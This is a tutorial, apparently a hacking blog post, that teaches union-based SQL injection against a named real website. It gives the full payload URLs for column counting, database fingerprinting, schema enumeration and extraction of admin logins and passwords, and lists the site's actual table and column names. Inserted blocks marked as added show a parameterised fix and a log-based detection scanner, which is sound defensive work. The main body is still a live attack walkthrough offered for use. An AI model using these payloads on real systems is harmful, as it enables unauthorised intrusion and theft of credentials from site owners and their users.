How to use SQL Injection? Best Online Tutorial for SQL Injection
I receive many emails asking how to hack a website using SQL injection, so here is the hacking tutorial on it.
[NOTE: This is for educational purposes only.]
This is a practical tutorial, as long as this .pk site is up!
So let's start. Here is the website on which this live testing was done: http://www.depo.org.pk
Try to find variables being passed to the inner script:
http://www.depo.org.pk/index.php?a=newsdetail&id=1
where id= is the variable passing a value to the SQL query.
Check whether it is vulnerable or not: put ' in place of 1, as shown below.
depo.org.pk/index.php?a=newsdetail&id='
If it shows an error, then we can apply SQLi on this URL. Now we need to determine the number of columns in the current table.
Increase the number of columns until you get rid of the error 'The used SELECT statements have a different number of columns':
+1
+1,2
+1,2,3
+1,2,3,4
+1,2,3,4,5
+1,2,3,4,5,6
+1,2,3,4,5,6,7
+1,2,3,4,5,6,7,8 ... and so on, in this order, until the column count is found!
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8
Here we get no error, so the query has eight columns.
Here, we used SQL functions directly from the browser:
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,database(),version(),4,5,6,7,8
database:- depo
version:- 5.0.45-log
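The union query works because the id parameter is pasted straight into the SQL text. The following added example (not code from the original page or from the site in question) rebuilds that handler in Python against a constructed in-memory SQLite table with the same eight-column shape, next to a hardened version that type-checks the id and binds it as a parameter. The table name news, its column names and the probe helper are assumptions made for this demo.

```python
import sqlite3


def build_db():
    """Constructed stand-in for the site's database: an in-memory SQLite table
    with the eight columns counted in the walkthrough above (not the real schema)."""
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE news(id INTEGER, title TEXT, body TEXT,
                          c4 TEXT, c5 TEXT, c6 TEXT, c7 TEXT, c8 TEXT);
        INSERT INTO news VALUES (1, 'Welcome', 'First post', '', '', '', '', '');
    """)
    return con


def newsdetail_vulnerable(con, id_param):
    """What index.php?a=newsdetail&id=... effectively does: the raw parameter
    is spliced into the SQL text, so it can become syntax instead of data."""
    sql = "SELECT * FROM news WHERE id=" + id_param
    return con.execute(sql).fetchall()


def newsdetail_fixed(con, id_param):
    """Hardened handler: validate the expected type, then bind the value."""
    try:
        id_int = int(id_param)  # anything that is not an integer is rejected outright
    except ValueError:
        return []
    # The placeholder keeps the value out of the SQL grammar entirely.
    return con.execute("SELECT * FROM news WHERE id=?", (id_int,)).fetchall()


def probe(handler, id_param):
    """Run one handler against a fresh database; report rows or the error class."""
    con = build_db()
    try:
        return ("rows", handler(con, id_param))
    except sqlite3.Error as e:
        return ("error", type(e).__name__)
    finally:
        con.close()


if __name__ == "__main__":
    # The three inputs from the walkthrough: a normal id, the quote probe,
    # and an eight-column union. Only the vulnerable handler reacts to them.
    for value in ["1", "'", "-1 union select 1,2,3,4,5,6,7,8"]:
        print(f"{value!r:40} vulnerable={probe(newsdetail_vulnerable, value)}")
        print(f"{'':40} fixed     ={probe(newsdetail_fixed, value)}")
```

SQLite raises the same kind of error as MySQL when the two SELECTs of a UNION have different column counts, which is why the seven-column case errors and the eight-column case returns the injected row. The fixed handler returns an empty result for every non-integer input, so neither the error message nor the injected row ever reaches the page.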
------------------------------------------------
Several useful functions (http://dev.mysql.com/doc/refman/5.0/en/functions.html)
user()
database()
version()
current_user()
load_file()
hex()
unhex()
char()
concat()
group_concat()
------------------------------------------------
Now we need to know the structure of the victim's MySQL database.
NOTE: MySQL keeps its column and table metadata in a separate database called 'information_schema'.
Attach the SQL query '+from+information_schema.tables+where+table_schema=database()' at the end of the column numbers!
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()
Now we want to fetch the table structure of the database named 'depo'!
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database()
Table names:
admin,feedback,ideas,inquiry,members_detail_page,
members_detail_page_pictures,news,newsletter,
org_prod_categories,organizations,orginquiry,pages,
product_categories,products,products_pictures,profile
Now it's the columns' turn!
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat(column_name),3,4,5,6,7,8+from+information_schema.columns+where+table_schema=database()
Column names:
id,login,password,id,name,
company,email,country,learnsite,
visits,content,graphics,loading,organization,
comments,date,id,fname,lname,nic,occupation,
designation,organization,address,
country,city,state,zip,phone,fax,email,website,
date,id,country,agency,telephone,fax,email,website,
demand,company,address,date,id,heading_one,
text_one,heading_two
It's time to fetch the login and password from the table 'admin'!
http://www.depo.org.pk/index.php?a=newsdetail&id=-1+union+select+1,group_concat%28login,0x3a,password%29,3,4,5,6,7,8+from+admin
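From the defending side, every request in this walkthrough leaves a recognisable trace in the web server's access log. The following added example (not part of the original post) scans constructed access-log lines shaped like the requests above, URL-decodes each query parameter (so the %28/%29 variant is seen in the clear) and flags the patterns that appear here: a non-numeric id, union select, information_schema, group_concat and an unbalanced quote. The combined log format, the NUMERIC_PARAMS set and the sample client addresses are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines (not real traffic; 203.0.113.0/24 and
# 198.51.100.0/24 are documentation ranges) in the shape of the requests
# walked through above, including the %28/%29-encoded variant.
SAMPLE_LOG = """\
203.0.113.5 - - [10/Oct/2023:12:00:01 +0000] "GET /index.php?a=newsdetail&id=1 HTTP/1.1" 200 5123
203.0.113.5 - - [10/Oct/2023:12:00:07 +0000] "GET /index.php?a=newsdetail&id=' HTTP/1.1" 500 412
203.0.113.5 - - [10/Oct/2023:12:00:19 +0000] "GET /index.php?a=newsdetail&id=-1+union+select+1,2,3,4,5,6,7,8 HTTP/1.1" 200 5001
203.0.113.5 - - [10/Oct/2023:12:00:31 +0000] "GET /index.php?a=newsdetail&id=-1+union+select+1,group_concat(table_name),3,4,5,6,7,8+from+information_schema.tables+where+table_schema=database() HTTP/1.1" 200 5210
203.0.113.5 - - [10/Oct/2023:12:00:44 +0000] "GET /index.php?a=newsdetail&id=-1+union+select+1,group_concat%28login,0x3a,password%29,3,4,5,6,7,8+from+admin HTTP/1.1" 200 5102
198.51.100.9 - - [10/Oct/2023:12:01:00 +0000] "GET /index.php?a=newsdetail&id=42 HTTP/1.1" 200 4980
"""

# Combined-log-format request line: client, timestamp, request target, status.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

# Parameters the application only ever uses as integers (assumption for this
# script; the tutorial's id= is one such parameter).
NUMERIC_PARAMS = {"id"}

# Signatures evaluated on the URL-decoded value of every query parameter.
SIGNATURES = [
    ("union_select", lambda v: re.search(r"\bunion\b\s+(?:all\s+)?select\b", v, re.I) is not None),
    ("information_schema", lambda v: re.search(r"\binformation_schema\b", v, re.I) is not None),
    ("group_concat", lambda v: re.search(r"\bgroup_concat\s*\(", v, re.I) is not None),
    ("unbalanced_quote", lambda v: v.count("'") % 2 == 1),
]


def classify_param(name, value):
    """Return the list of reasons a single decoded parameter looks like SQLi."""
    reasons = []
    if name in NUMERIC_PARAMS and not re.fullmatch(r"-?\d+", value):
        reasons.append("non_numeric_id")
    for label, check in SIGNATURES:
        if check(value):
            reasons.append(label)
    return reasons


def scan_log(text):
    """Scan log text and return one finding per suspicious query parameter."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        client, stamp, target, status = m.groups()
        # parse_qsl decodes both '+' and %XX escapes, so encoded payloads are compared in the clear
        for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
            reasons = classify_param(name, value)
            if reasons:
                findings.append({"client": client, "time": stamp, "status": int(status),
                                 "param": name, "value": value, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['client']} {f['status']} {f['param']}={f['value'][:40]!r} -> {', '.join(f['reasons'])}")
```

The type check on id is the most robust of the rules: it fires on the very first quote probe (the 500 response) before any union payload is sent, and it does not depend on the attacker's choice of keywords or encoding.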
FOR EDUCATIONAL PURPOSES ONLY.